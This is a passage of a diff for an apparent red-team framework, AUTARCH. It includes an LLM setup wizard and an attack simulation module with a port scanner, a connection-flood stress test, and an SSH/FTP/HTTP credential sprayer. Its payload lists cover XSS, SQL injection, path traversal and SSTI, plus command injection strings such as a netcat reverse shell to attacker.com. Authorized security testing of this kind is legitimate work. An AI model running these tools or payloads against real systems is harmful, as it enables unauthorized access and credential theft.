# List of paths to try
paths_to_try = [
Path(path), # As-is
Path(path).expanduser(), # Expand ~
framework_dir / path.lstrip('/'), # Relative to framework dir
framework_dir / path, # Relative without stripping /
]
# Handle /dh_framework/... pattern (missing /home/user prefix)
if path.startswith('/dh_framework'):
paths_to_try.append(framework_dir / path[len('/dh_framework/'):])
if path.startswith('dh_framework'):
paths_to_try.append(framework_dir / path[len('dh_framework/'):])
# Also try models/ subdirectory
model_name = Path(path).name
paths_to_try.append(framework_dir / 'models' / model_name)
for p in paths_to_try:
try:
if p.exists():
return str(p.resolve())
except (PermissionError, OSError):
continue
return None
def skip_setup(self) -> bool:
"""Skip setup and mark as complete without LLM configuration.
Returns:
True always (setup skipped successfully)
"""
clear_screen()
display_banner()
self.print_header("Setup Skipped")
print(f"\n{Colors.WHITE} AUTARCH will run without LLM features.{Colors.RESET}")
print(f"{Colors.DIM} The following modules will still work:{Colors.RESET}")
print(f"{Colors.GREEN} - defender (Defense){Colors.RESET}")
print(f"{Colors.GREEN} - counter (Counter){Colors.RESET}")
print(f"{Colors.GREEN} - analyze (Analyze){Colors.RESET}")
print(f"{Colors.GREEN} - recon (OSINT){Colors.RESET}")
print(f"{Colors.GREEN} - adultscan (OSINT){Colors.RESET}")
print(f"{Colors.GREEN} - simulate (Simulate){Colors.RESET}")
print(f"{Colors.GREEN} - msf (Offense){Colors.RESET}")
print()
print(f"{Colors.YELLOW} LLM-dependent modules (chat, agent) will not work{Colors.RESET}")
print(f"{Colors.YELLOW} until you configure a model with --setup{Colors.RESET}")
print()
self.config.mark_setup_complete()
self.print_info(f"Configuration saved to: {self.config.config_path}")
print(f"\n{Colors.WHITE} Press Enter to continue...{Colors.RESET}")
try:
input()
except (EOFError, KeyboardInterrupt):
pass
return True
def run(self, allow_skip: bool = True) -> bool:
"""Run the setup wizard.
Args:
allow_skip: Whether to show the skip option
Returns:
True if setup completed successfully, False if cancelled
"""
clear_screen()
display_banner()
self.print_header("AUTARCH First-Time Setup")
print(f"\n{Colors.WHITE} Welcome to AUTARCH! This wizard will help you configure")
print(f" the LLM settings for your system.{Colors.RESET}\n")
# Offer skip option
if allow_skip:
print(f"{Colors.DIM} Many modules work without an LLM (OSINT, forensics, etc.){Colors.RESET}")
print()
print(f" {Colors.GREEN}[1]{Colors.RESET} Configure LLM (for chat & agent features)")
print(f" {Colors.YELLOW}[2]{Colors.RESET} Skip setup (use without LLM)")
print()
choice = self.get_input("Select option", "1")
if choice == "2":
return self.skip_setup()
# Model Path Configuration
self.print_header("Model Configuration")
self.print_info("AUTARCH supports two model formats:")
print(f" {Colors.CYAN}GGUF{Colors.RESET} - Single file models for llama.cpp (recommended for CPU)")
print(f" {Colors.CYAN}SafeTensors{Colors.RESET} - HuggingFace models for transformers (GPU optimized)")
print()
self.print_info("Enter a local path OR a HuggingFace model ID.")
self.print_info("Examples:")
print(f" {Colors.DIM}GGUF: /home/user/models/llama-7b.gguf{Colors.RESET}")
print(f" {Colors.DIM}SafeTensors: /home/user/models/Lily-Cybersecurity-7B{Colors.RESET}")
print(f" {Colors.DIM}HuggingFace ID: segolilylabs/Lily-Cybersecurity-7B-v0.2{Colors.RESET}")
model_type = None
while True:
# Get current configured path for default
current_gguf = self.config.get('llama', 'model_path', '')
current_transformers = self.config.get('transformers', 'model_path', '')
default_path = current_gguf or current_transformers or ''
model_path = self.get_input("Model path", default_path if default_path else None)
if model_path:
# Strip quotes that users might accidentally include
model_path = model_path.strip().strip('"').strip("'")
model_path = os.path.expanduser(model_path)
# Try to resolve the path (handles relative paths, /dh_framework/... etc.)
resolved_path = self.resolve_model_path(model_path)
if resolved_path:
model_path = resolved_path
is_valid, detected_type = self.validate_model_path(model_path)
if is_valid and detected_type:
model_type = detected_type
if model_type == 'gguf':
self.config.set('llama', 'model_path', model_path)
self.config.set('autarch', 'llm_backend', 'local')
self.print_info(f"GGUF model found: {os.path.basename(model_path)}")
else: # transformers
self.config.set('transformers', 'model_path', model_path)
self.config.set('autarch', 'llm_backend', 'transformers')
self.print_info(f"SafeTensors model found: {os.path.basename(model_path)}")
break
elif self._is_huggingface_id(model_path):
# Looks like a HuggingFace model ID (e.g., 'org/model-name')
model_type = 'transformers'
self.config.set('transformers', 'model_path', model_path)
self.config.set('autarch', 'llm_backend', 'transformers')
self.print_info(f"HuggingFace model ID: {model_path}")
self.print_info("Model will be downloaded/loaded from HuggingFace cache")
break
else:
self.print_error("Model not found or unrecognized format.")
self.print_info("For GGUF: provide path to .gguf file")
self.print_info("For SafeTensors: provide path to model directory")
self.print_info("For HuggingFace: use format 'org/model-name'")
retry = self.get_input("Try again? (y/n)", "y")
if retry.lower() != 'y':
self.print_warning("Setup cancelled - no model configured")
return False
else:
self.print_warning("No model path provided")
skip = self.get_input("Continue without model? (y/n)", "n")
if skip.lower() == 'y':
break
continue
# Backend-specific configuration
if model_type == 'gguf':
# GGUF/llama.cpp specific settings
self.print_header("Context Settings (llama.cpp)")
self.print_info("Configure the context window and threading.")
n_ctx = self.get_int_input(
"Context size (tokens)",
self.config.get_int('llama', 'n_ctx', 4096),
min_val=512,
max_val=131072
)
self.config.set('llama', 'n_ctx', n_ctx)
n_threads = self.get_int_input(
"Number of CPU threads",
self.config.get_int('llama', 'n_threads', 4),
min_val=1,
max_val=256
)
self.config.set('llama', 'n_threads', n_threads)
# GPU Configuration
self.print_header("GPU Configuration")
self.print_info("Set the number of layers to offload to GPU.")
self.print_info("Set to 0 for CPU-only, or higher for GPU acceleration.")
n_gpu_layers = self.get_int_input(
"GPU layers (0 for CPU only)",
self.config.get_int('llama', 'n_gpu_layers', 0),
min_val=0
)
self.config.set('llama', 'n_gpu_layers', n_gpu_layers)
# Generation Settings
self.print_header("Generation Settings")
self.print_info("Configure text generation parameters.")
temperature = self.get_float_input(
"Temperature (creativity)",
self.config.get_float('llama', 'temperature', 0.7),
min_val=0.0,
max_val=2.0
)
self.config.set('llama', 'temperature', temperature)
top_p = self.get_float_input(
"Top P (nucleus sampling)",
self.config.get_float('llama', 'top_p', 0.9),
min_val=0.0,
max_val=1.0
)
self.config.set('llama', 'top_p', top_p)
top_k = self.get_int_input(
"Top K",
self.config.get_int('llama', 'top_k', 40),
min_val=0
)
self.config.set('llama', 'top_k', top_k)
repeat_penalty = self.get_float_input(
"Repeat penalty",
self.config.get_float('llama', 'repeat_penalty', 1.1),
min_val=0.0,
max_val=2.0
)
self.config.set('llama', 'repeat_penalty', repeat_penalty)
max_tokens = self.get_int_input(
"Max tokens per response",
self.config.get_int('llama', 'max_tokens', 2048),
min_val=1,
max_val=32768
)
self.config.set('llama', 'max_tokens', max_tokens)
elif model_type == 'transformers':
# Transformers/SafeTensors specific settings
self.print_header("Device Configuration (transformers)")
self.print_info("Configure hardware settings for model loading.")
print(f" {Colors.DIM}Device options: auto, cuda, cpu, mps{Colors.RESET}")
device = self.get_input(
"Device",
self.config.get('transformers', 'device', 'auto')
)
self.config.set('transformers', 'device', device)
# Quantization options
self.print_header("Quantization (Memory Optimization)")
self.print_info("Quantization reduces memory usage at the cost of some quality.")
print(f" {Colors.DIM}Requires bitsandbytes package for 8-bit/4-bit{Colors.RESET}")
print(f"\n {Colors.GREEN}[1]{Colors.RESET} No quantization (full precision)")
print(f" {Colors.GREEN}[2]{Colors.RESET} 8-bit quantization (half memory)")
print(f" {Colors.GREEN}[3]{Colors.RESET} 4-bit quantization (quarter memory)")
quant_choice = self.get_input("Quantization option", "1")
if quant_choice == "2":
self.config.set('transformers', 'load_in_8bit', 'true')
self.config.set('transformers', 'load_in_4bit', 'false')
elif quant_choice == "3":
self.config.set('transformers', 'load_in_8bit', 'false')
self.config.set('transformers', 'load_in_4bit', 'true')
else:
self.config.set('transformers', 'load_in_8bit', 'false')
self.config.set('transformers', 'load_in_4bit', 'false')
# Generation Settings
self.print_header("Generation Settings")
self.print_info("Configure text generation parameters.")
temperature = self.get_float_input(
"Temperature (creativity)",
self.config.get_float('transformers', 'temperature', 0.7),
min_val=0.0,
max_val=2.0
)
self.config.set('transformers', 'temperature', temperature)
top_p = self.get_float_input(
"Top P (nucleus sampling)",
self.config.get_float('transformers', 'top_p', 0.9),
min_val=0.0,
max_val=1.0
)
self.config.set('transformers', 'top_p', top_p)
top_k = self.get_int_input(
"Top K",
self.config.get_int('transformers', 'top_k', 40),
min_val=0
)
self.config.set('transformers', 'top_k', top_k)
repeat_penalty = self.get_float_input(
"Repetition penalty",
self.config.get_float('transformers', 'repetition_penalty', 1.1),
min_val=0.0,
max_val=2.0
)
self.config.set('transformers', 'repetition_penalty', repeat_penalty)
max_tokens = self.get_int_input(
"Max tokens per response",
self.config.get_int('transformers', 'max_tokens', 2048),
min_val=1,
max_val=32768
)
self.config.set('transformers', 'max_tokens', max_tokens)
# Save configuration
self.print_header("Saving Configuration")
self.config.mark_setup_complete()
self.print_info(f"Configuration saved to: {self.config.config_path}")
# Summary
self.print_header("Setup Complete")
print(f"\n{Colors.GREEN} AUTARCH has been configured with the following settings:{Colors.RESET}\n")
if model_type == 'gguf':
print(f" {Colors.YELLOW}Backend: llama.cpp (GGUF){Colors.RESET}\n")
settings = self.config.get_llama_settings()
elif model_type == 'transformers':
print(f" {Colors.YELLOW}Backend: transformers (SafeTensors){Colors.RESET}\n")
settings = self.config.get_transformers_settings()
else:
print(f" {Colors.YELLOW}No model configured{Colors.RESET}\n")
settings = {}
for key, value in settings.items():
if key == 'model_path' and value:
value = os.path.basename(value)
print(f" {Colors.CYAN}{key:20}{Colors.RESET}: {value}")
print(f"\n{Colors.WHITE} Press Enter to continue to the main menu...{Colors.RESET}")
try:
input()
except (EOFError, KeyboardInterrupt):
pass
return True
def run():
"""Module entry point."""
wizard = SetupWizard()
return wizard.run()
if __name__ == "__main__":
run()

652
modules/simulate.py Normal file
View File

@@ -0,0 +1,652 @@
"""
AUTARCH Simulate Module
Attack simulation and security testing
Red team exercises and controlled attack simulations.
"""
import os
import sys
import subprocess
import socket
import hashlib
import random
import string
import time
import ftplib
import base64
import urllib.request
from pathlib import Path
from datetime import datetime
# Module metadata
DESCRIPTION = "Attack simulation & red team tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "simulate"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
class Simulator:
"""Attack simulation tools."""
def __init__(self):
pass
def print_status(self, message: str, status: str = "info"):
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
def run_cmd(self, cmd: str, timeout: int = 60) -> tuple:
try:
result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
return result.returncode == 0, result.stdout.strip()
except:
return False, ""
def password_audit(self):
"""Audit password strength and check common passwords."""
print(f"\n{Colors.BOLD}Password Audit{Colors.RESET}")
print(f"{Colors.DIM}Test password strength against common patterns{Colors.RESET}\n")
password = input(f"{Colors.WHITE}Enter password to test: {Colors.RESET}")
if not password:
return
print(f"\n{Colors.CYAN}Analyzing password...{Colors.RESET}\n")
score = 0
feedback = []
# Length check
if len(password) >= 16:
score += 3
feedback.append(f"{Colors.GREEN}+ Excellent length (16+){Colors.RESET}")
elif len(password) >= 12:
score += 2
feedback.append(f"{Colors.GREEN}+ Good length (12+){Colors.RESET}")
elif len(password) >= 8:
score += 1
feedback.append(f"{Colors.YELLOW}~ Minimum length (8+){Colors.RESET}")
else:
feedback.append(f"{Colors.RED}- Too short (<8){Colors.RESET}")
# Character diversity
has_upper = any(c.isupper() for c in password)
has_lower = any(c.islower() for c in password)
has_digit = any(c.isdigit() for c in password)
has_special = any(c in '!@#$%^&*()_+-=[]{}|;:,.<>?' for c in password)
if has_upper:
score += 1
feedback.append(f"{Colors.GREEN}+ Contains uppercase{Colors.RESET}")
else:
feedback.append(f"{Colors.RED}- No uppercase letters{Colors.RESET}")
if has_lower:
score += 1
feedback.append(f"{Colors.GREEN}+ Contains lowercase{Colors.RESET}")
else:
feedback.append(f"{Colors.RED}- No lowercase letters{Colors.RESET}")
if has_digit:
score += 1
feedback.append(f"{Colors.GREEN}+ Contains numbers{Colors.RESET}")
else:
feedback.append(f"{Colors.RED}- No numbers{Colors.RESET}")
if has_special:
score += 2
feedback.append(f"{Colors.GREEN}+ Contains special characters{Colors.RESET}")
else:
feedback.append(f"{Colors.YELLOW}~ No special characters{Colors.RESET}")
# Common patterns
common_patterns = ['password', '123456', 'qwerty', 'letmein', 'admin', 'welcome', 'monkey', 'dragon']
if password.lower() in common_patterns:
score = 0
feedback.append(f"{Colors.RED}- Extremely common password!{Colors.RESET}")
# Sequential characters
if any(password[i:i+3].lower() in 'abcdefghijklmnopqrstuvwxyz' for i in range(len(password)-2)):
score -= 1
feedback.append(f"{Colors.YELLOW}~ Contains sequential letters{Colors.RESET}")
if any(password[i:i+3] in '0123456789' for i in range(len(password)-2)):
score -= 1
feedback.append(f"{Colors.YELLOW}~ Contains sequential numbers{Colors.RESET}")
# Keyboard patterns
keyboard_patterns = ['qwerty', 'asdf', 'zxcv', '1qaz', '2wsx']
for pattern in keyboard_patterns:
if pattern in password.lower():
score -= 1
feedback.append(f"{Colors.YELLOW}~ Contains keyboard pattern{Colors.RESET}")
break
# Display results
for line in feedback:
print(f" {line}")
print(f"\n{Colors.BOLD}Score: {max(0, score)}/10{Colors.RESET}")
if score >= 8:
print(f"{Colors.GREEN}Strength: STRONG{Colors.RESET}")
elif score >= 5:
print(f"{Colors.YELLOW}Strength: MODERATE{Colors.RESET}")
else:
print(f"{Colors.RED}Strength: WEAK{Colors.RESET}")
# Hash generation
print(f"\n{Colors.CYAN}Password Hashes:{Colors.RESET}")
print(f" MD5: {hashlib.md5(password.encode()).hexdigest()}")
print(f" SHA1: {hashlib.sha1(password.encode()).hexdigest()}")
print(f" SHA256: {hashlib.sha256(password.encode()).hexdigest()}")
def port_scanner(self):
"""TCP port scanner."""
print(f"\n{Colors.BOLD}Port Scanner{Colors.RESET}")
target = input(f"{Colors.WHITE}Enter target IP/hostname: {Colors.RESET}").strip()
if not target:
return
port_range = input(f"{Colors.WHITE}Port range (e.g., 1-1000) [1-1024]: {Colors.RESET}").strip() or "1-1024"
try:
start_port, end_port = map(int, port_range.split('-'))
except:
self.print_status("Invalid port range", "error")
return
# Resolve hostname
try:
ip = socket.gethostbyname(target)
if ip != target:
print(f"\n{Colors.DIM}Resolved {target} to {ip}{Colors.RESET}")
except:
self.print_status(f"Could not resolve {target}", "error")
return
print(f"\n{Colors.CYAN}Scanning {target} ports {start_port}-{end_port}...{Colors.RESET}\n")
open_ports = []
scanned = 0
total = end_port - start_port + 1
for port in range(start_port, end_port + 1):
scanned += 1
if scanned % 100 == 0:
print(f"\r{Colors.DIM}Progress: {scanned}/{total} ports scanned...{Colors.RESET}", end="")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
result = sock.connect_ex((ip, port))
if result == 0:
open_ports.append(port)
sock.close()
print(f"\r{' ' * 50}\r", end="") # Clear progress line
if open_ports:
print(f"{Colors.GREEN}Open ports found:{Colors.RESET}\n")
services = {
21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns",
80: "http", 110: "pop3", 143: "imap", 443: "https", 445: "smb",
3306: "mysql", 3389: "rdp", 5432: "postgresql", 8080: "http-proxy"
}
for port in open_ports:
service = services.get(port, "unknown")
print(f" {port:5}/tcp open {service}")
else:
print(f"{Colors.YELLOW}No open ports found in range{Colors.RESET}")
print(f"\n{Colors.DIM}Scanned {total} ports{Colors.RESET}")
def banner_grabber(self):
"""Grab service banners."""
print(f"\n{Colors.BOLD}Banner Grabber{Colors.RESET}")
target = input(f"{Colors.WHITE}Enter target IP/hostname: {Colors.RESET}").strip()
port = input(f"{Colors.WHITE}Enter port [80]: {Colors.RESET}").strip() or "80"
if not target:
return
try:
port = int(port)
except:
self.print_status("Invalid port", "error")
return
print(f"\n{Colors.CYAN}Grabbing banner from {target}:{port}...{Colors.RESET}\n")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target, port))
# Send HTTP request for web ports
if port in [80, 443, 8080, 8443]:
sock.send(b"HEAD / HTTP/1.1\r\nHost: " + target.encode() + b"\r\n\r\n")
else:
sock.send(b"\r\n")
banner = sock.recv(1024).decode('utf-8', errors='ignore')
sock.close()
if banner:
print(f"{Colors.GREEN}Banner:{Colors.RESET}")
for line in banner.split('\n')[:15]:
print(f" {line.strip()}")
else:
print(f"{Colors.YELLOW}No banner received{Colors.RESET}")
except socket.timeout:
self.print_status("Connection timed out", "warning")
except ConnectionRefusedError:
self.print_status("Connection refused", "error")
except Exception as e:
self.print_status(f"Error: {e}", "error")
def payload_generator(self):
"""Generate various payloads for testing."""
print(f"\n{Colors.BOLD}Payload Generator{Colors.RESET}")
print(f"{Colors.DIM}Generate test payloads for security testing{Colors.RESET}\n")
print(f" {Colors.YELLOW}[1]{Colors.RESET} XSS Payloads")
print(f" {Colors.YELLOW}[2]{Colors.RESET} SQL Injection Payloads")
print(f" {Colors.YELLOW}[3]{Colors.RESET} Command Injection Payloads")
print(f" {Colors.YELLOW}[4]{Colors.RESET} Path Traversal Payloads")
print(f" {Colors.YELLOW}[5]{Colors.RESET} SSTI Payloads")
print()
choice = input(f"{Colors.WHITE}Select payload type: {Colors.RESET}").strip()
payloads = {
"1": [ # XSS
'<script>alert(1)</script>',
'<img src=x onerror=alert(1)>',
'<svg onload=alert(1)>',
'"><script>alert(1)</script>',
"'-alert(1)-'",
'<body onload=alert(1)>',
'{{constructor.constructor("alert(1)")()}}',
],
"2": [ # SQLi
"' OR '1'='1",
"' OR '1'='1' --",
"'; DROP TABLE users; --",
"1' ORDER BY 1--",
"1 UNION SELECT null,null,null--",
"' AND 1=1 --",
"admin'--",
],
"3": [ # Command Injection
"; ls -la",
"| cat /etc/passwd",
"& whoami",
"`id`",
"$(whoami)",
"; ping -c 3 127.0.0.1",
"| nc -e /bin/sh attacker.com 4444",
],
"4": [ # Path Traversal
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\config\\sam",
"....//....//....//etc/passwd",
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
"..%252f..%252f..%252fetc/passwd",
"/etc/passwd%00",
],
"5": [ # SSTI
"{{7*7}}",
"${7*7}",
"{{config}}",
"{{self.__class__.__mro__}}",
"<%= 7*7 %>",
"{{request.application.__globals__}}",
],
}
if choice in payloads:
names = {
"1": "XSS", "2": "SQL Injection", "3": "Command Injection",
"4": "Path Traversal", "5": "SSTI"
}
print(f"\n{Colors.CYAN}{names[choice]} Payloads:{Colors.RESET}\n")
for i, payload in enumerate(payloads[choice], 1):
print(f" [{i}] {payload}")
def network_stress(self):
"""Network stress test (controlled)."""
print(f"\n{Colors.BOLD}Network Stress Test{Colors.RESET}")
print(f"{Colors.RED}WARNING: Only use on systems you own or have permission to test!{Colors.RESET}\n")
target = input(f"{Colors.WHITE}Enter target IP: {Colors.RESET}").strip()
port = input(f"{Colors.WHITE}Enter target port: {Colors.RESET}").strip()
duration = input(f"{Colors.WHITE}Duration in seconds [5]: {Colors.RESET}").strip() or "5"
if not target or not port:
return
try:
port = int(port)
duration = int(duration)
if duration > 30:
duration = 30
print(f"{Colors.YELLOW}Limited to 30 seconds max{Colors.RESET}")
except:
self.print_status("Invalid input", "error")
return
confirm = input(f"\n{Colors.YELLOW}Start stress test against {target}:{port} for {duration}s? (yes/no): {Colors.RESET}").strip()
if confirm.lower() != 'yes':
return
print(f"\n{Colors.CYAN}Starting stress test...{Colors.RESET}")
import time
start_time = time.time()
connections = 0
errors = 0
while time.time() - start_time < duration:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.connect((target, port))
sock.send(b"X" * 1024)
sock.close()
connections += 1
except:
errors += 1
if connections % 100 == 0:
print(f"\r{Colors.DIM}Connections: {connections}, Errors: {errors}{Colors.RESET}", end="")
print(f"\n\n{Colors.GREEN}Test complete:{Colors.RESET}")
print(f" Connections attempted: {connections}")
print(f" Errors: {errors}")
print(f" Duration: {duration}s")
# ==================== CREDENTIAL SPRAYER ====================
DEFAULT_USERNAMES = [
'admin', 'root', 'user', 'test', 'guest', 'administrator', 'ftp',
'www', 'postgres', 'mysql', 'oracle', 'backup', 'operator', 'info',
'support', 'webmaster', 'demo', 'pi', 'ubuntu', 'deploy',
]
DEFAULT_PASSWORDS = [
'password', '123456', 'admin', 'root', 'letmein', 'welcome',
'changeme', 'test', 'guest', 'default', 'pass', 'qwerty',
'123456789', 'password1', '12345678', '1234', 'abc123',
'monkey', 'master', 'dragon',
]
def credential_sprayer(self):
"""Credential spraying against network services."""
print(f"\n{Colors.BOLD}Credential Sprayer{Colors.RESET}")
print(f"{Colors.RED}WARNING: Only use on systems you own or have explicit authorization to test!{Colors.RESET}")
print(f"{Colors.DIM}Test common credentials against network services{Colors.RESET}")
print(f"{Colors.CYAN}{'' * 50}{Colors.RESET}\n")
# Protocol selection
print(f" {Colors.YELLOW}[1]{Colors.RESET} SSH")
print(f" {Colors.YELLOW}[2]{Colors.RESET} FTP")
print(f" {Colors.YELLOW}[3]{Colors.RESET} HTTP Basic Auth")
print()
proto_choice = input(f"{Colors.WHITE}Select protocol: {Colors.RESET}").strip()
protocols = {'1': 'ssh', '2': 'ftp', '3': 'http'}
protocol = protocols.get(proto_choice)
if not protocol:
return
default_ports = {'ssh': '22', 'ftp': '21', 'http': '80'}
target = input(f"{Colors.WHITE}Target IP/hostname: {Colors.RESET}").strip()
if not target:
return
port = input(f"{Colors.WHITE}Port [{Colors.GREEN}{default_ports[protocol]}{Colors.WHITE}]: {Colors.RESET}").strip() or default_ports[protocol]
try:
port = int(port)
except ValueError:
self.print_status("Invalid port", "error")
return
# Username source
print(f"\n{Colors.CYAN}Username source:{Colors.RESET}")
print(f" {Colors.YELLOW}[1]{Colors.RESET} Built-in top 20")
print(f" {Colors.YELLOW}[2]{Colors.RESET} Manual entry")
print(f" {Colors.YELLOW}[3]{Colors.RESET} File")
user_choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip()
usernames = []
if user_choice == '1':
usernames = self.DEFAULT_USERNAMES[:]
elif user_choice == '2':
user_input = input(f"{Colors.WHITE}Usernames (comma-separated): {Colors.RESET}").strip()
usernames = [u.strip() for u in user_input.split(',') if u.strip()]
elif user_choice == '3':
filepath = input(f"{Colors.WHITE}Username file path: {Colors.RESET}").strip()
try:
with open(filepath, 'r') as f:
usernames = [line.strip() for line in f if line.strip()]
except Exception as e:
self.print_status(f"Error reading file: {e}", "error")
return
if not usernames:
self.print_status("No usernames provided", "error")
return
# Password source
print(f"\n{Colors.CYAN}Password source:{Colors.RESET}")
print(f" {Colors.YELLOW}[1]{Colors.RESET} Built-in top 20")
print(f" {Colors.YELLOW}[2]{Colors.RESET} Manual entry")
print(f" {Colors.YELLOW}[3]{Colors.RESET} File")
pass_choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip()
passwords = []
if pass_choice == '1':
passwords = self.DEFAULT_PASSWORDS[:]
elif pass_choice == '2':
pass_input = input(f"{Colors.WHITE}Passwords (comma-separated): {Colors.RESET}").strip()
passwords = [p.strip() for p in pass_input.split(',') if p.strip()]
elif pass_choice == '3':
filepath = input(f"{Colors.WHITE}Password file path: {Colors.RESET}").strip()
try:
with open(filepath, 'r') as f:
passwords = [line.strip() for line in f if line.strip()]
except Exception as e:
self.print_status(f"Error reading file: {e}", "error")
return
if not passwords:
self.print_status("No passwords provided", "error")
return
# Delay and confirmation
delay = input(f"{Colors.WHITE}Delay between attempts (seconds) [{Colors.GREEN}1.0{Colors.WHITE}]: {Colors.RESET}").strip() or "1.0"
try:
delay = max(0.5, float(delay)) # Enforce minimum 0.5s
except ValueError:
delay = 1.0
total_combos = len(usernames) * len(passwords)
est_time = total_combos * delay
print(f"\n{Colors.CYAN}{'' * 50}{Colors.RESET}")
print(f" Protocol: {protocol.upper()}")
print(f" Target: {target}:{port}")
print(f" Usernames: {len(usernames)}")
print(f" Passwords: {len(passwords)}")
print(f" Combinations: {total_combos}")
print(f" Delay: {delay}s")
print(f" Est. time: {int(est_time)}s ({int(est_time/60)}m)")
print(f"{Colors.CYAN}{'' * 50}{Colors.RESET}")
confirm = input(f"\n{Colors.YELLOW}Start credential spray? (yes/no): {Colors.RESET}").strip().lower()
if confirm != 'yes':
return
results = self._run_spray(protocol, target, port, usernames, passwords, delay)
# Summary
print(f"\n{Colors.CYAN}{'' * 50}{Colors.RESET}")
print(f"{Colors.BOLD}Spray Complete{Colors.RESET}")
print(f" Attempts: {total_combos}")
print(f" Successes: {Colors.GREEN}{len(results)}{Colors.RESET}")
if results:
print(f"\n{Colors.GREEN}Valid Credentials:{Colors.RESET}")
for r in results:
print(f" {Colors.GREEN}[+]{Colors.RESET} {r['user']}:{r['password']}")
def _spray_ssh(self, target: str, port: int, user: str, password: str) -> bool:
"""Try SSH login with given credentials."""
try:
import paramiko
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(target, port=port, username=user, password=password, timeout=5,
allow_agent=False, look_for_keys=False)
client.close()
return True
except ImportError:
# Fallback to sshpass
success, _ = self.run_cmd(
f"sshpass -p '{password}' ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 -p {port} {user}@{target} exit",
timeout=10
)
return success
except:
return False
def _spray_ftp(self, target: str, port: int, user: str, password: str) -> bool:
"""Try FTP login with given credentials."""
try:
ftp = ftplib.FTP()
ftp.connect(target, port, timeout=5)
ftp.login(user, password)
ftp.quit()
return True
except:
return False
def _spray_http_basic(self, target: str, port: int, user: str, password: str) -> bool:
"""Try HTTP Basic Auth with given credentials."""
try:
url = f"http://{target}:{port}/"
credentials = base64.b64encode(f"{user}:{password}".encode()).decode()
req = urllib.request.Request(url, headers={
'Authorization': f'Basic {credentials}',
'User-Agent': 'Mozilla/5.0',
})
with urllib.request.urlopen(req, timeout=5) as response:
return response.getcode() not in [401, 403]
except urllib.error.HTTPError as e:
return e.code not in [401, 403]
except:
return False
def _run_spray(self, protocol: str, target: str, port: int,
usernames: list, passwords: list, delay: float = 1.0) -> list:
"""Execute the credential spray."""
spray_funcs = {
'ssh': self._spray_ssh,
'ftp': self._spray_ftp,
'http': self._spray_http_basic,
}
spray_func = spray_funcs.get(protocol)
if not spray_func:
self.print_status(f"Unsupported protocol: {protocol}", "error")
return []
successes = []
attempt = 0
max_attempts = 500
print(f"\n{Colors.CYAN}Starting spray...{Colors.RESET}\n")
for user in usernames:
for password in passwords:
attempt += 1
if attempt > max_attempts:
self.print_status(f"Max attempts ({max_attempts}) reached", "warning")
return successes
print(f"\r{Colors.DIM} [{attempt}] Trying {user}:{password[:15]}...{Colors.RESET}", end='', flush=True)
try:
result = spray_func(target, port, user, password)
if result:
print(f"\r{' ' * 60}\r {Colors.GREEN}[+] SUCCESS: {user}:{password}{Colors.RESET}")
successes.append({'user': user, 'password': password})
except:
pass
time.sleep(delay)
print(f"\r{' ' * 60}\r", end='')
return successes
def show_menu(self):
clear_screen()
display_banner()
print(f"{Colors.YELLOW}{Colors.BOLD} Attack Simulation{Colors.RESET}")
print(f"{Colors.DIM} Red team exercises and testing{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
print(f" {Colors.YELLOW}[1]{Colors.RESET} Password Audit")
print(f" {Colors.YELLOW}[2]{Colors.RESET} Port Scanner")
print(f" {Colors.YELLOW}[3]{Colors.RESET} Banner Grabber")
print(f" {Colors.YELLOW}[4]{Colors.RESET} Payload Generator")
print(f" {Colors.YELLOW}[5]{Colors.RESET} Network Stress Test")
print(f" {Colors.YELLOW}[6]{Colors.RESET} Credential Sprayer")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
def run(self):
while True:
self.show_menu()
try:
choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip()
if choice == "0":
break
elif choice == "1":
self.password_audit()
elif choice == "2":
self.port_scanner()
elif choice == "3":
self.banner_grabber()
elif choice == "4":
self.payload_generator()
elif choice == "5":
self.network_stress()
elif choice == "6":
self.credential_sprayer()
if choice in ["1", "2", "3", "4", "5", "6"]:
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
except (EOFError, KeyboardInterrupt):
break
def run():
Simulator().run()
if __name__ == "__main__":
run()

1502
modules/sms_forge.py Normal file

File diff suppressed because it is too large Load Diff

400
modules/snoop_decoder.py Normal file
View File

@@ -0,0 +1,400 @@
"""
AUTARCH Snoop Database Decoder Module
Decrypts and imports Snoop Project databases into AUTARCH
"""
import base64
import json
import os
import sys
from pathlib import Path
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors
from core.sites_db import SitesDatabase
# Module metadata
NAME = "Snoop Decoder"
DESCRIPTION = "Decrypt and import Snoop Project databases"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "osint"
class SnoopDecoder:
"""Decoder for Snoop Project encoded databases."""
def __init__(self):
self.sites_db = SitesDatabase()
from core.paths import get_data_dir
self.data_dir = get_data_dir() / "sites"
self.data_dir.mkdir(parents=True, exist_ok=True)
def decode_database(self, filepath: str) -> dict:
"""Decode a Snoop database file.
Args:
filepath: Path to the encoded database file (BDdemo, BDfull, etc.)
Returns:
Decoded dictionary of sites.
"""
print(f"{Colors.CYAN}[*] Reading encoded database...{Colors.RESET}")
with open(filepath, 'r', encoding='utf8') as f:
db = f.read().strip()
original_size = len(db)
